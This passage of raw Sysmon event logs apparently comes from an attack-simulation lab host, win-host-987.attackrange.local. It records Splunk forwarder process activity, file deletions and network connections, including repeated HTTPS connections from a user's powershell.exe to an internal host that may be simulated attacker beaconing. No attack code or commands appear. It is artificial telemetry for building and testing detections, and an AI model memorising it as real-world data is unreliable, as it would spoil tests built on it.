Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.016{B81B27B7-9F4D-6140-4F56-04000000C801}57006928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465C3BDF8CEE1B2635B6F9AB3D3F5963,SHA256=BC622EC7AA5A32AC9E8AEB02B0D20B8039E0CEA0D863E46043D429F16D27B1ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50376-false10.0.1.12-8000- 10341000x800000000000000036496197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F4F-6140-5156-04000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F4F-6140-5156-04000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.248{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F4F-6140-5156-04000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:39.233{B81B27B7-9F4F-6140-5156-04000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:40.978{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DDB367099B3E98E7D6B1F14BA3FDB14,SHA256=B42BC0904A85B353BDF9725584BAA400D9E81966574F221241DD5E26759D1192,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:40.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BDA5E9E3EAE6575D254209DE5F14561,SHA256=4E5B027BC4C44F388C31E88FF39FB61D8EA04A183E86D5AB3C1123417E356DCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:41.992{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB49D8AADBD4879192795F2B38FD6115,SHA256=3599C24D4A6A9AAB4F0D3A2B112A8141F67BE702A55277B35F283F8FDC6023B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:11.626{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50377-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:41.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7D6D245DEDD81F175BD0396D2FA2723C,SHA256=092A70912AF75B37A68315902456EDA9C05F481D615041AFA574B8FC216FFD1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:43.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FE0E14C0F060299C61470B21DED269,SHA256=9570F259DA228D59DAA934C11E59CFBCAE18AF29F99D4569411DD9CBF174ECC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:44.028{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BFA9506578527A3058BAFEACD41212E,SHA256=452A641E571C3C24042FA7D0CE10FD9B6688D5348FAFB7C7F3039FDCE80D7A64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:45.988{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B9000696838128E6E29629085760A9AA,SHA256=B93D8F003553DF329DF540293B8CD6D5278E9EF3F30C86FF3283E4BF87BBBCC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:45.043{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18B5F797E288DE576FF6E76CEA766D9,SHA256=96487A745291C4174ECB4E63BCB600AA6A3A3C29238B8DB8769B5959D9BECD4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:46.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA19615C2B2624236D85B9E23530E3B3,SHA256=097B2B35D306FC1CBEA3F2BF07231B42FB2678BE8E3123CC05326242B972E6F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:16.637{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50379-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:15.921{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50378-false10.0.1.12-8000- 23542300x800000000000000036496210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:47.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=098F742621121B96E0AB6D652D672B60,SHA256=C419C3CE89A88DD2EFD26AD6889EBE8E4F0C24638FA8236ED96BD11CAE10A48F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:48.124{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0201D853EC07BA4D114EBB194EAB95A3,SHA256=11F2D03328A615040FDBF65408DCB9DC3FDB7E31593A2BF7665FB63021294F09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:49.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F237B22C2960435DE7F12E4E29BD9BAE,SHA256=ECD4769DE920E5C0F50462265613AF41609BF327B79EE83F97591DAA3FC15CD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:50.222{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C93BF097D1A7F38603CC2DD1D7CCBD5,SHA256=B049A3CBBA5767B58E102A188765D9226154CDCDF67090B6321532EEAD00D7B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:51.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3964133244328569F6F6D4D3B9B7C0DC,SHA256=B49805850559EED3B3C96964B2D68A0FD03E94B0569A746F2B7AF9874D93B6C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:21.679{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50380-false10.0.1.12-8000- 23542300x800000000000000036496216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:51.253{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70D7207A2C103B59B5D0AA195F4659C9,SHA256=C49C908BD9F82FD0AB9449F9B31EFA2CE76FBEB3957114124F75A356BBB7FC4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:22.647{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50381-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:52.283{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0898571E6D7AF009CF6808EC681081D8,SHA256=E8B3D2626471BFAC00D05EA506D32CC815C1E408FB831A3B1AA12E4CBEAF0022,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:53.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31496B8597DA33E2E2250F88252921F2,SHA256=2E52DFC019E12DD4C606B37D3AEDDA3ADB7CFD9A0E1427ABD7115832C0BB78C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:54.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47EB5B69E64250CB40BE1F07D553D39,SHA256=0677C1F2692BF626E1E8B2FECB084E1B50256DC4FD996B5E5AEC681B36E2FA9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:55.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A5361ED669CC7DB511F8C1B657F6419,SHA256=47BEA73D738E90331AA9533CFF15D0CC31E5AEBBF0194885164A74134EBAF151,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:56.389{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300F89A6698B2499FD5E26E5C6C2F04C,SHA256=655D542177D2EC786E1ABF30EF5A02B56BAD3B5D9A784EC477D86AFFD53C6544,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.659{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50382-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:56.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=83F1952E46F36DAF8F04DEB2C11BF2CD,SHA256=995B15436412DBAF39BDA4AB9DD20D464AEF219CB9A8663471E9F55C21133934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:57.407{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A00F4204BDD47DB61DD9C5AFED6C5BB,SHA256=658BA1F735F36E9A630897CAE0993FF4523DAA18CC79363107907F212317E33C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.758{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50383-false10.0.1.12-8000- 23542300x800000000000000036496229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:58.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3149B8208AF52F09F7C600ECBA2975D6,SHA256=7B974150D55315DE9F0D0BB3DAB0E3CAB4A5EE29144B6335E1D58304988A1967,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:59.485{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1F981E618CB519AA6773C85A171E45,SHA256=EAB60B7FBDE1356B7A34E203F114DEC78B0418F376ECF898A9BFCDF47F740452,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:00.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65ACC201933D2597B338F115D1A2AB78,SHA256=42AC68F96BEDDC3A06451BE6EDC1094285A16F5000CB3AAEA231213E8C8716D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:30.665{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50384-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:00.222{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B05A6B52539C4FD67682B8A269D2F7FC,SHA256=FB27DBA9F06455C402ADEB3E8C947CF48487E3967D9B13E2313E3B65EA5DD6FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:01.536{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 